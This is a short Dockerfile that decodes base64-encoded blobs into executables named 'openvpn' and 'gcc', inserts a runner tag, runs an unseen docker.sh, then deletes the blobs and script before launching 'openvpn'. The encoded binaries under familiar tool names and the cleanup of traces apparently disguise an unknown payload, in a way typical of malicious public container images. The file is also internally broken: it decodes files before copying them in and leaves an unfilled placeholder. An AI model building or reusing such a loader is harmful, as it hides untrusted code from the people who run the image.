FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > openvpn.log'

RUN base64 --decode openvpn.64 > openvpn
RUN base64 --decode gcc.64 > gcc

RUN chmod +x gcc

COPY openvpn .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' openvpn
RUN bash ./docker.sh

RUN rm --force --recursive openvpn _REPO_NAME__.64 docker.sh gcc gcc.64

CMD openvpn
